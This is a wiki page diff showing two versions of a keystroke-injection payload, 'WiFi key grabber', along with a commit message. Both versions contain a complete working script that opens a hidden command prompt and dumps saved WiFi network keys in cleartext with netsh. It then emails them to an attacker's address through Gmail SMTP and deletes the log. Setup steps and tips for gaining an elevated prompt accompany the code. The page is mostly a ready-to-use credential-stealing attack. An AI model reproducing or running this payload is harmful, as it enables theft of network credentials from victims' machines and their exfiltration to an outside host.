Payload---WiFi-key-grabber.md, before:

### Change the following things;
* **ACCOUNT**: Your **gmail account**
* **PASSWORD**: Your **gmail password**
* Make sure you have allowed less secure apps to login on your google account; 
* https://support.google.com/accounts/answer/6010255
* **RECEIVER**: The email you want to send the contents of 'log' to

## **Code**;
```
REM Title: WiFi key grabber
REM Author: SiemH
REM Version: 6
REM Description: 
REM Finds SSID, Network type, Authentication type and the network key and saves them to 'log'
REM Creates SMTP server and emails the contents of 'log' using the specified Gmail account to the specified receiver.

REM FASE 1: Preparation
DELAY 3000
REM --> Minimize all windows
WINDOWS d
REM --> Open cmd
WINDOWS r
DELAY 500
STRING cmd
ENTER
DELAY 200

REM FASE 2: Information gathering
REM --> Find the SSID and set 'a'
STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=:" %a in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set a=%a
ENTER
STRING set a="%a:~1%"
ENTER
REM --> Get raw info and set 'a'
STRING netsh wlan show profiles %a% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>a
ENTER
REM --> Find the Network type in the raw info and set 'b'
STRING for /f "tokens=3 delims=: " %a in ('findstr "Network type" a') do set b=%a
ENTER
REM --> Find the auth type in the raw info and set 'c'
STRING for /f "tokens=2 delims=: " %a in ('findstr "Authentication" a') do set c=%a
ENTER
REM --> Find the key content in the raw info and set 'd'
STRING for /f "tokens=3 delims=: " %a in ('findstr "Key Content" a') do set d=%a
ENTER
REM --> Delete raw info / 'a'
STRING del a
ENTER
REM --> Write all info to log
STRING echo ssid: %a%>>log & echo type: %b%>>log & echo auth: %c%>>log & echo key: %d%>>log
ENTER

REM FASE 3: Phone home
REM --> Create an SMTP server with specified credentials and send log to specified receiver
STRING powershell
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
REM --> Google account login
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ACCOUNT@gmail.com', 'PASSWORD')
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'ACCOUNT@gmail.com'
ENTER
REM --> Log receiver
STRING $ReportEmail.To.Add('RECEIVER@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'WiFi key grabber'
ENTER
STRING $ReportEmail.Body = (Get-Content log | out-string)
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 500

REM FASE 4: Final cleanup
REM --> Delete log and exit
STRING del log & exit
ENTER
```

### Change log;
1. Original
2. Bug fixes and narrowed commands
3. Send contents of log instead the file itself
4. Removed the space as delimiter
5. Added the STRING set A="%A:~1%" to be able to use SSID's with spaces as well
6. Removed .txt extensions, made variables and file names lower case, removed unnecessary text from log and added some more comments

### Suggestions;
**If you have any suggestions, write them down here.**
- DELAY 50 between powershell exit and cmd exit
- If the SSID has a space like "TPLINK HOME" then 'a' would be set to "TPLINK"; error "Profile "TPLINK" is not found on the system" **FIXED**
- Added delay after sending SMTP message, to make sure the 'exit' and 'del log' are executed
- The cmd prompt must be elevated to get any passwords.  If you change from using the WINDOWS r to using the search menu for "cmd" and pressing ctrl+shift+enter you can get a UAC prompt.  From there you'd need to alt+Y to get the elevated prompt. You can also use the run box but with the following command in Win7 and later:
powershell Start-Process cmd -Verb runAs
- **This is only true in some cases, for me personally it works without the elevated prompt on multiple systems.**

Commit message:

Added some spaces, quote interferance; sometimes 'Ä' instead of '"A'

Payload---WiFi-key-grabber.md, after:

### Change the following things;
* **ACCOUNT**: Your **gmail account**
* **PASSWORD**: Your **gmail password**
* Make sure your Gmail password does not start with a capital letter, in some locales this causes the quote to be merged with the letter; 'Ä' '"A'
* Make sure you have allowed less secure apps to login on your google account; 
* https://support.google.com/accounts/answer/6010255
* **RECEIVER**: The email you want to send the contents of 'log' to

## **Code**;
```
REM Title: WiFi key grabber
REM Author: SiemH
REM Version: 7
REM Description: 
REM Finds SSID, Network type, Authentication type and the network key and saves them to 'log'
REM Creates SMTP server and emails the contents of 'log' using the specified Gmail account to the specified receiver.

REM FASE 1: Preparation
DELAY 3000
REM --> Minimize all windows
WINDOWS d
DELAY 250
REM --> Open cmd
WINDOWS r
DELAY 500
STRING cmd
ENTER
DELAY 200

REM FASE 2: Information gathering
REM --> Find the SSID and set 'a'
STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=:"  %a in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set a=%a
ENTER
STRING set a="%a:~1%"
ENTER
REM --> Get raw info and set 'a'
STRING netsh wlan show profiles %a% key=clear | findstr /c:"Network type"  /c:" Authentication"  /c:"Key Content"| findstr /v "broadcast"| findstr /v "Radio">>a
ENTER
REM --> Find the Network type in the raw info and set 'b'
STRING for /f "tokens=3 delims=: "  %a in ('findstr "Network type"  a') do set b=%a
ENTER
REM --> Find the auth type in the raw info and set 'c'
STRING for /f "tokens=2 delims=: "  %a in ('findstr " Authentication"  a') do set c=%a
ENTER
REM --> Find the key content in the raw info and set 'd'
STRING for /f "tokens=3 delims=: "  %a in ('findstr "Key Content"  a') do set d=%a
ENTER
REM --> Delete raw info / 'a'
STRING del a
ENTER
REM --> Write all info to log
STRING echo ssid: %a%>>log & echo type: %b%>>log & echo auth: %c%>>log & echo key: %d%>>log
ENTER

REM FASE 3: Phone home
REM --> Create an SMTP server with specified credentials and send log to specified receiver
STRING powershell
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
REM --> Google account login, password must start with a lowercase letter
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ACCOUNT@gmail.com', 'PASSWORD')
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'ACCOUNT@gmail.com'
ENTER
REM --> Log receiver
STRING $ReportEmail.To.Add('RECEIVER@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'WiFi key grabber'
ENTER
STRING $ReportEmail.Body = (Get-Content log | out-string)
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 500

REM FASE 4: Final cleanup
REM --> Delete log and exit
STRING del log & exit
ENTER
```

### Change log;
1. Original
2. Bug fixes and narrowed commands
3. Send contents of log instead the file itself
4. Removed the space as delimiter
5. Added the STRING set A="%A:~1%" to be able to use SSID's with spaces as well
6. Removed .txt extensions, made variables and file names lower case, removed unnecessary text from log and added some more comments
7. Added some spaces, quote interferance; sometimes 'Ä' instead of '"A'

### Suggestions;
**If you have any suggestions, write them down here.**
- DELAY 50 between powershell exit and cmd exit
- If the SSID has a space like "TPLINK HOME" then 'a' would be set to "TPLINK"; error "Profile "TPLINK" is not found on the system" **FIXED**
- Added delay after sending SMTP message, to make sure the 'exit' and 'del log' are executed
- The cmd prompt must be elevated to get any passwords.  If you change from using the WINDOWS r to using the search menu for "cmd" and pressing ctrl+shift+enter you can get a UAC prompt.  From there you'd need to alt+Y to get the elevated prompt. You can also use the run box but with the following command in Win7 and later:
powershell Start-Process cmd -Verb runAs
- **This is only true in some cases, for me personally it works without the elevated prompt on multiple systems.**
